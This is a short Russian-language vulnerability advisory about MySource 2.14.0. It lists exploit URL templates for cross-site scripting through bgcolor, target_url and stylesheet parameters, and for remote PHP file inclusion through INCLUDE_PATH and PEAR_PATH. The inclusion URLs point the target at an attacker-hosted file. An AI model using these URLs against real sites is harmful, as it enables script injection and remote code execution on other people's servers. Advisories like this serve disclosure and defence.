Уязвимости в MySource 2.14.0

Уязвимость в MySource 2.14.0 позволяет удаленному пользователю произвести XSS нападение и получить доступ к данным других пользователей, выполнить PHP код.
1. Межсайтовый скриптинг возможет из-за недостаточной обработки входных данных перед отображением их в браузере пользователей. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примеры:
http://[victim]/web/edit/upgrade_in_progress_backend.php?target_url=»>[code]
http://[victim]/squizlib/bodycopy/pop_ups/insert_table.php?bgcolor=[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_props.php?bgcolor=[code]
http://[victim]/squizlib/bodycopy/pop_ups/header.php?bgcolor=[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_row_props.php?bgcolor=[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_props.php?bgcolor=[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_type_wysiwyg.php?stylesheet=»>[code]

2. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе.
Примеры:
http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://[host]/[file]?
http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http://[host]/[file]?
http://[victim]/web/init_mysource.php?INCLUDE_PATH=http://[host]/[file]?
http://[victim]/pear/Net_Socket/Socket.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/HTTP_Request/Request.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail/Mail.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date/Span.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mimeDecode.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mime.php?PEAR_PATH=http://[host]/[file]?
Для удачной эксплуатации уязвимостей должна быть включена опция register_globals.

Источник: SecurityLab.ru